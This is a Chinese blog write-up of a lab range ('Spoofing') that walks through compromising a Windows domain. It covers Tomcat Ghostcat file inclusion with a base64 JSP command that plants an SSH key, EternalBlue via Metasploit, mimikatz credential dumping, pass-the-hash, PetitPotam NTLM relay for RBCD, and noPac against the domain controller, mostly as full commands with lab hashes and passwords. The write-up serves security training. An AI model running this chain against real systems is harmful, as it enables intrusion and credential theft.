前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >春秋云镜-Spoofing

春秋云镜-Spoofing

作者头像
用户2700375
发布于 2023-05-09 02:27:59
发布于 2023-05-09 02:27:59
1.5K00
代码可运行
举报
文章被收录于专栏:很菜的web狗很菜的web狗
运行总次数:0
代码可运行

工作期间某天项目经理找到,需要给客户录一个靶场的WP要求写详细一些过程,项目经理说云镜难度还是可以的,所以丢了一个Spoofing。但尴尬的是,当时平没有很快完成任务,实在是姿势盲区了(本人太菜了。

web

拿到目标ip 47.92.146.61 nmap扫端口。

我们首先访问8080 发现一个未授权的后台,但是基本没有任何功能

dirsearch进行目录扫描

存在一些目录

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://47.92.146.61:8080/docs/

访问可得知Tomcat 9.0.3 + ajp13

存在

https://github.com/00theway/Ghostcat-CNVD-2020-10487

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python3 ajpShooter.py http://47.92.146.61:8080 8009 /WEB-INF/web.xml read

用此脚本读取/WEB-INF/web.xml 进行漏洞验证。

利用成功。并且内容中的 url-pattern 路径我们可以挨个访问一下

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://47.92.146.61:8080/UploadServlet

发现一处上传点(dirsearch是没有直接扫到的,可以加入到自己的字典中)

注意这里由于靶机问题重启 靶机ip从 47.92.146.61 变为了 39.98.183.3

由于上面扫描我们发现开了22端口

首先本机生成一对公私钥,并如下构造 大致内容就是将公钥写到 /root/.ssh/authorized_keys下面

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjE5yG8ayo88aGqr9oNOa4sfLHRL+gPW+BRQUJiiXymM9P1Pu46xc+ITjXndvFUm/LjKwcmlqSPI7EWIEFwWzxPfNeWpjqJSYb6KkYgf3n+zvvKmX+A6CDZZ4Kl0ABV+8dkYML/Jz5IQql8YdAgKCpHMoiV/bGwVTkCDRhuUXL1TW2m7pwXUw9RWM3i8G8WKnpMfQtsYXIo0Qatxx0Lxq3bpIEdkSKGTptGyCuvZCouUd5cpUpJJ4yrW8I0Jg9Zqqifsc2iRrwK6zcW7pHkLAkksEZC2DyM78iR5Fl4Z/PKiJHWYhThTFxByVsikp31q2gfATCx1vjmz6tm3AA/BPkrWtJ1xY9izsjlu46LdhTMD1U8BnJUhSuTUd2lAKjp9qKklp15wfdBbDk4SxWa6BNtwo6v1VDIfRkmPMhzU5ynm1OQsOLJKrRJHt0oJfrabD2e6UZ+DUSyA8Ha2E1FJiXbykqa6vV9THb6LltArhhFNikR42cqxUH1Q/qoM8bG00=" >> /root/.ssh/authorized_keys

chmod 600 /root/.ssh/authorized_keys

在进行base64加密

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==

所以我们上传Spoofing.txt文件 内容为

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>");%>

目的是将Spoofing.txt文件代码执行,将我们的公钥写到靶机里面

最终利用漏洞Ghostcat执行此文件

执行成功公钥写入,直接登陆靶机服务器即可

flag01

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
flag{41af3ec9-9043-42bc-9fb6-06d6a5aa5231}

ifconfig得到 当前Ubuntu ip 为 172.22.11.76

Ubuntu 172.22.11.76

接下来我们重点看下内网,利用fscan扫一下看看

将fscan上传到靶机

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
scp -i id_rsa  /Users/sch0lar/Downloads/fscan_386 root@39.98.183.3:/

fscan扫C段

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./fscan_386 -h 172.22.11.1/24

发现内网中其他三台主机 并且172.22.11.6为域控

172.22.11.6 DC XIAORANG\XIAORANG-DC

172.22.11.26 XIAORANG\XR-LCM3AE8B

172.22.11.45 XIAORANG\XR-DESKTOP

经fscan扫描发现 172.22.11.45 可能存在永恒之蓝漏洞。

机器出网我们进行反向代理

内网成功访问,说明代理成功。msf 17010去打一下172.22.11.45 这台机器

msf设置代理

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
setg Proxies socks5:103.20.221.39:9999
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 172.22.11.45
set lport 1433

注意这里默认的4444会话不能正常建立,经测试使用一些常见端口 1433 3306 80即可

Dump hash

本地凭据

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

msf中加载 kiwi load kiwi creds_all获取域凭据

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
XR-DESKTOP$  XIAORANG  849af87004aedcb12d26d3646e4d1809  6cdc7983267c995623cf242b70869f295a22fccc
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f  明文 xrihGHgoNZQ

通过有了 admin和admin hash 可直接psexec 登录

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 psexec.py Administrator@172.22.11.45 -hashes :48f6da83eb89a4da8a1cc963b855a799 -codec gbk

flag02

flag{b326254f-c786-4752-92ce-f511ed7e959d}

把域用户 yangmei加入该机器的本地管理员

确定域控ip为

域渗透

域信息收集

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 -q bloodhound-python -u yangmei -p xrihGHgoNZQ -d xiaorang.lab --dns-tcp -ns 172.22.11.6 -c all --zip

https://github.com/Porchetta-Industries/CrackMapExec

Petitpotam 扫描

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam
  • 无ADCS + Petitpotam + ntlm中继打法攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)
  • 满足条件,目标机器需要开启webclient服务
  • WebClient扫描,确定只能拿下 172.22.11.26 (XR-LCM3AE8B)

https://github.com/Hackndo/WebclientServiceScanner

NTLM中继过程中需要使用HTTP协议来完成中继请求和响应,而Webclient服务包含了HTTP协议相关,所以开启 Webclient 服务可以为 NTLM 中继提供必要的功能支持

  • 中继攻击前言:
    • 实战中的中继打法只需要停掉80占用服务,开启端口转发(portfwd,CS在后续版本中添加了rportfwd_local,直接转发到客户端本地)
    • 本次演示类似实战的打法,不选择把impacket丢到入口ubuntu上面这种操作
  • 中继攻击环境配置: 端口转发 + 代理我们目前需要把服务器的80,转发到客户端本地的80
  • 注意:由于SSH的反向端口转发监听的时候只会监听127.0.0.1,所以这时候需要点技巧如图所示,即使反向端口转发79端口指定监听全部 (-R *:79:127.0.0.1:80),端口79依旧绑定在了127.0.0.1(图中顺便把socks5代理也开了)
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ssh -i id_rsa root@47.92.254.136 -D 0.0.0.0:1080 -R \*:79:127.0.0.1:80

加多一条socat,让流量 0.0.0.0:80 转发到 127.0.0.1:79,再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &

简单说也就是当我们访问ubuntu的80端口会被转发到ubuntu的79端口,ubuntu的79端口会转发到我们本机的80端口

  • 本地开启ntlmrelayx
  • 注意:
    • 前面提到,没有ldaps,所以不能使用addcomputer
    • 同时在使用proxychains后,ldap://后面只能接dc的ip
    • 利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 Petitpotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26

可以看到,已经完成RBCD攻击了,接下来就是直接申请XR-LCM3AE8B的银票了

申请XR-LCM3AE8B CIFS票据

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 getST.py -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :849af87004aedcb12d26d3646e4d1809 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

这里的hash是前面通过172.22.11.45 mimikatz抓取到的

构造银票了我们psexec连接

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
KRB5CCNAME=/Users/sch0lar/sec/impacket/examples/administrator.ccache proxychains4 python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk

flag03

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
flag{7cd97e18-b25b-42f3-8006-f6d0fc2cbd42}

域渗透 – NoPAC

smbclient.py 传 mimikatz

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
KRB5CCNAME=/Users/sch0lar/sec/impacket/examples/administrator.ccache proxychains4 python3 smbclient.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
cd C:\Windows\Temp
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1

nopac,只有zhanghui能成功,zhanghui在MA_Admin组,MA_Admin组对computer 能够创建对象,但是在bloodhound没看到

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++

需要补这一张图

Bloodhound看不到,主要原因是没把CreateChild采集进json

回到nopac,加上 create-child 参数

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -create-child -dc-ip 172.22.11.6

使用nopac申请到的cifs票据登录进入DC,flag04在 C:\users\administrator\flag\flag04.txt

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
export KRB5CCNAME=/Users/sch0lar/sec/noPac/Administrator_xiaorang-dc.xiaorang.lab.ccache 
proxychains4 psexec.py xiaorang.lab/administrator@xiaorang-dc.xiaorang.lab -k -no-pass -dc-ip 172.22.11.6 -target-ip 172.22.11.6 -codec gbk

flag04

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
flag{683570c8-a6dc-45c2-95aa-9e9b171ed400}
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-05-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
通信工程师,到底是干啥的?
作为一名通信工程师 小枣君无数次被人问到以下问题: 每次 小枣君都要不厌其烦地解释 久而久之,越描越黑 干脆,就懒得解释了 如今,又到了一年一度的校招季 眼瞅着很多年轻人 投了通信岗位的简历 却又不知道这些岗位具体是做什么的 显然不合适 所以,今天小枣君就认真解释一下 通信工程师,到底是干啥的 通信工程师 顾名思义,就是干通信的工程师 何为通信? 北邮版《通信原理》中写道: “通信,乃是互通信息。” 这句话说出了通信的本质 通信的目标 就是实现信息的传递 在我们的生活中 到处
鲜枣课堂
2022/12/30
6050
通信工程师,到底是干啥的?
5G、切片、MEC[通俗易懂]
接入网是通信网络最靠近用户终端(例如手机、可穿戴设备、物联网设备)的部分,负责将用户终端都连接上。无线通信里的接入网又称为RAN(Radio Access Network,无线接入网)。大家耳熟能详的基站(Base Station)就是RAN的主要组成部分。 核心网,英文为Core Network,缩写为CN。移动通信系统中的核心网又被称为“移动核心网”。我们可以把它理解为一个“非常复杂的加强版路由器”。它负责对基站收集上来的数据进行处理,然后发送到外部网络(例如互联网)。同样,它也负责将外部网络的数据传输给基站,并最终送达手机终端。所有手机终端的网络使用权限都归核心网管理。它是整个移动通信网络的“管理中枢”。需要注意的是,核心网并不是某种特定的设备,它是很多种设备网元(网络单元)的统称。不同的核心网网元有不同的功能,不同通信网络的核心网网元数量和架构也大不相同。 承载网(Bearer Network)专门负责传输网元之间的数据,包括接入网和核心网之间的数据,以及接入网、核心网内部网元之间的数据。
全栈程序员站长
2022/11/09
5.9K0
5G、切片、MEC[通俗易懂]
5G承载网到底有什么不同?
以前我们更多介绍的是接入网和核心网。如果说核心网是人的大脑,接入网是四肢,那么承载网就是连接大脑和四肢的神经网络,负责传递信息和指令。
鲜枣课堂
2019/07/20
2.4K0
5G 网络将会怎样改变世界?
近日,腾讯无线网络与物联网技术负责人李秋香与高校科研教授、产业链、运营商等各行业的嘉宾一起参与了知乎「 科技共振之 5G+ 」活动,除了专业的5G探讨,也聊了不少和开发者们息息相关的问题。基于此,云加社区联手知乎科技,从知乎超过 10000 条 5G 相关问答中精选内容落地社区专题「 共探 5G 」。
腾讯云开发者社区
2019/12/06
2.1K0
核心网,你为什么这么难?!
长期关注小枣君的朋友们一定知道,我是一个典型的“核心网恐惧症”患者。一直以来,我都在给大家灌输一个思想,那就是——
鲜枣课堂
2019/07/22
8320
核心网,你为什么这么难?!
关于5G接入网,看这一篇就够啦!
接入网,在我们无线通信里,一般指无线接入网,也就是通常所说的RAN(Radio Access Network)。
鲜枣课堂
2019/07/20
1.9K0
中兴的芯片,到底什么水平?
6月17日,中兴通讯在深交所互动平台上表示:“公司具备芯片设计和开发能力,7nm芯片规模量产,已在全球5G规模部署中实现商用,5nm芯片正在技术导入”。
鲜枣课堂
2020/06/23
1.2K0
5G 无线接入网络是如何形成的?
对于5G,华为提出了几个特征:峰值网络速率达到10Gbps、网络传输速度比4G快10—100倍、网络时延从4G的50毫秒缩短到1毫秒、满足1000亿量级的网络连接、整个移动网络的每比特能耗降低1000倍,那么5G网络是如何建成的呢?请看晟科通信的分部讲解。
晟科通信
2020/06/10
8300
5G 无线接入网络是如何形成的?
边缘计算到底是什么?有哪些应用场景?
6月19日,鲜枣课堂创始人小枣君在CIOE微课堂与大家分享《5G边缘计算的发展与应用》,他分享并讨论了边缘计算的概念、边缘计算与5G的关系及5G边缘计算的应用。以下是光博君整理的完整版课程回顾。
边缘计算
2019/07/11
5820
边缘计算到底是什么?有哪些应用场景?
接入网究竟是个什么网
如今,无论是在家里使用的固定网络(宽带),还是家里户外随时能用的移动网络(手机),都已经和水、电、气一样,成为日常生活中不可或缺的一部分。
网络工程师笔记
2021/06/23
1.5K0
接入网究竟是个什么网
郑州洪灾,通信网络的容灾机制,发挥作用了吗?
洪水造成的城市内涝,给当地居民的生命财产带来重大损失。来自现场的触目惊心的视频画面,牵动着全国人民的心。
鲜枣课堂
2021/07/22
3970
看完秒懂!移动通信网络,就这么简单!
“绝大部分通信系统,都可以用分层的角度来看,也必须用分层的角度来看。看懂了这个系统的层级,就看懂了这个系统的70%。——小枣君”
鲜枣课堂
2019/07/22
1.7K0
看完秒懂!移动通信网络,就这么简单!
5G前传的最新进展
此前我介绍5G承载网和接入网的时候,曾经和大家说过,承载网和接入网之间存在紧密的联系。接入网的架构,直接影响了承载网的架构。
鲜枣课堂
2020/06/11
6160
5G前传的最新进展
全云化来袭,运营商又该如何存活?
编者按:随着移动通信网络朝着虚拟化全云化发展,新一波无线运营商如Dish Network、日本乐天移动网络、甚至广电即将涌出。他们是电信行业的破坏者还是颠覆者?传统运营商又能否招架住这一波冲击?
SDNLAB
2019/08/27
7700
全云化来袭,运营商又该如何存活?
LS-NET-001-什么是承载网,核心网和接入网
奶油话梅糖
2025/03/20
1910
新“基站”传奇
接入网,在无线通信里,一般指无线接入网,也就是RAN(Radio Access Network)。
鲜枣课堂
2019/07/22
1.2K0
新“基站”传奇
小白科普-通信网中核心网、城域网、接入网
通信网络的一个整体结构,大致包括:骨干网、核心网、城域网、接入网,其中接入网又分为无线接入和有线接入,以及承载网。
亿源通科技HYC
2023/08/03
4.5K0
小白科普-通信网中核心网、城域网、接入网
软硬兼施,看英特尔如何赋能5G网络转型
11月19日,中国移动2020全球合作伙伴大会在广州开幕。作为中国移动重要的战略合作伙伴,英特尔在大会上充分展示了其在深化云网融合,推动网络转型方面所取得的成果,以及多款软硬件明星产品。
鲜枣课堂
2020/12/02
7050
通信行业术语扫盲
在通信行业也干了一年多了,最近发现自己对通信行业的知识甚是缺乏,很多名词在记住之后很快又会忘掉,所以做一些笔记来记录这些术语。
流川疯
2022/05/10
1.6K0
5G边缘计算的发展前景与应用
5月30日上午,由工控兄弟连主办的“新工业 智物联”全国巡回研讨会南京站在1865科技产业创意产业园举行,会议就工业互联、物联网、智能制造行业的未来发展进行交流讨论。小枣君应邀参加大会CEO闭门峰会论坛,并做“5G边缘计算的发展前景与应用”主题演讲。
鲜枣课堂
2019/07/20
1.1K0
相关推荐
通信工程师,到底是干啥的?
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档